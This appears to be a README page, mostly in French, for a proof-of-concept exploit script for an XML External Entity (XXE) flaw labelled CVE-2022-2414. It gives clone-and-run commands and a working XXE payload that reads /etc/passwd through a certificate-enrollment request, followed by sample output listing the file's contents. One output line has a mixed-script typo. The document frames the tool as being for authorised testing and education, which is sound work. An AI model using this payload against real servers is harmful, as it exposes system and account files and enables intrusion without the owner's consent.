
est un script PoC pour démontrer l'exploitation d'une vulnérabilité XML External Entity (XXE)
GenXMLExternalEntityExploit est un script PoC pour démontrer l'exploitation d'une vulnérabilité XML External Entity (XXE). Le script utilise des charges utiles XML pour lire des fichiers sensibles sur un serveur cible. Cela peut être utile pour les tests de sécurité, les tests d'intrusion ou à des fins éducatives.
git clone https://github.com/geniuszly/CVE-2022-2414
cd CVE-2022-2414
python3 GenXMLExternalEntityExploit.py
TARGET_URL dans le script pour pointer vers le serveur cible que vous souhaitez tester.XML_PAYLOAD dans le script pour des chemins de fichiers ou des opérations côté serveur spécifiques.Par défaut, le script utilise la charge utile suivante pour lire le fichier /etc/passwd :
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...
Cet outil est destiné uniquement à des fins éducatives et aux tests de sécurité autorisés. L'auteur décline toute responsabilité en cas d'utilisation illégale de cet outil.